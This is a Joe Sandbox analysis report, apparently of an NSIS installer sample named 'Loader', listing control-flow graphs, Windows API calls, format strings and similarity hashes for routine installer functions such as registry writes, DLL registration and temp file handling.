Control-flow Graph (starting at 00402880; legend: Executed / Not Executed)
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • RegCreateKeyExW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                                                                                                                                                                • RegSetValueExW.KERNELBASE(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nscB629.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                                                                                                                                                                • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                                                                                                                                                                • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                                                                                                                                                                • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                                                                                                                                                                • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                                                                                                                                                                • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                                                                                                                                                                • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                                                                                                                                                                • API String ID: 1641139501-220328614
                                                                                                                                                                                                                                                                                                                • Opcode ID: 7eba5588e31dbe8d60aed41eef07a2ac5faacf0d5bbe736eb3a00d236a23317c
                                                                                                                                                                                                                                                                                                                • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7eba5588e31dbe8d60aed41eef07a2ac5faacf0d5bbe736eb3a00d236a23317c
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69

Control-flow Graph (starting at 0040337F; legend: Executed / Not Executed)
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 004034CE
                                                                                                                                                                                                                                                                                                                • WriteFile.KERNELBASE(00000000,00000000,0042B20B,00403792,00000000), ref: 004034FF
                                                                                                                                                                                                                                                                                                                • WriteFile.KERNELBASE(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                                                                                                                                                                • String ID: ... %d%%$pAB$rstFileExA
                                                                                                                                                                                                                                                                                                                • API String ID: 651206458-2059934793

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • GlobalAlloc.KERNELBASE(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                                                                                                                                                                • WriteFile.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNELBASE(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                                                                                                                                                                • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                                                                                                                                                                • API String ID: 3294113728-3145124454

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042B20B,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042B20B,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042B20B,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nscB629.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                                                                                                                                                                                • FreeLibrary.KERNELBASE(?,?), ref: 004024C3
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\nscB629.tmp\NAct.dll, xrefs: 004024CE, 004024E5
                                                                                                                                                                                                                                                                                                                • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                                                                                                                                                                • `G, xrefs: 0040246E
                                                                                                                                                                                                                                                                                                                • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                                                                                                                                                                • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nscB629.tmp\NAct.dll$Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                                                                                                                                                                                                                                                • API String ID: 1033533793-284255697

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                control_flow_graph 829 401eb9-401ec4 830 401f24-401f26 829->830 831 401ec6-401ec9 829->831 832 401f53-401f69 GlobalAlloc call 406831 830->832 833 401f28-401f2a 830->833 834 401ed5-401ee3 call 4062cf 831->834 835 401ecb-401ecf 831->835 845 401f6e-401f7b 832->845 836 401f3c-401f4e call 406035 833->836 837 401f2c-401f36 call 4062cf 833->837 847 401ee4-402702 call 406831 834->847 835->831 838 401ed1-401ed3 835->838 851 402387-40238d GlobalFree 836->851 837->836 838->834 842 401ef7-402e50 call 406035 * 3 838->842 850 4030e3-4030f2 842->850 845->850 845->851 862 402708-40270e 847->862 851->850 862->850
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00402387
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: FreeGloballstrcpyn
                                                                                                                                                                                                                                                                                                                • String ID: Exch: stack < %d elements$Pop: stack empty$install
                                                                                                                                                                                                                                                                                                                • API String ID: 1459762280-2295550231

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                control_flow_graph 864 405eab-405eb7 865 405eb8-405eec GetTickCount GetTempFileNameW 864->865 866 405efb-405efd 865->866 867 405eee-405ef0 865->867 869 405ef5-405ef8 866->869 867->865 868 405ef2 867->868 868->869
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                                                                                                                                                                                                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                                                                                                • String ID: nsa
                                                                                                                                                                                                                                                                                                                • API String ID: 1716503409-2209301699
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00405D85: CharNextW.USER32(-00000002,?,00461E18,004E30C8,004067C1,00461E18,00461E18,00406CDA,?,-00000002,00406CDA,?,004CF0A0), ref: 00405D93
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00405D85: CharNextW.USER32(00000000), ref: 00405D98
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00405D85: CharNextW.USER32(00000000), ref: 00405DB0
                                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(00461E18,004E30C8,00000000,00461E18,00461E18,00406CDA,?,-00000002,00406CDA,?,004CF0A0), ref: 0040680A
                                                                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(00461E18,00461E18), ref: 00406817
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 3248276644-0
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • FreeLibrary.KERNELBASE(?,004CF0A0,00000000,-00000002,004038A2,00403AFD,?), ref: 00403CC9
                                                                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00403CD0
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Free$GlobalLibrary
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 1100898210-0
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 415043291-0
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                                                                                                                                                                                                                • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405E73
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                                                                                • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                                                                                                                                                • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                                                • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 4115351271-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                                                                                                                                                                • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: FilePointer
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(FFFFFFFF,00403AFD,?), ref: 00403890
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004051C2
                                                                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042B20B,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nscB629.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                                                                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004052EC
                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00405313
                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000008), ref: 0040535F
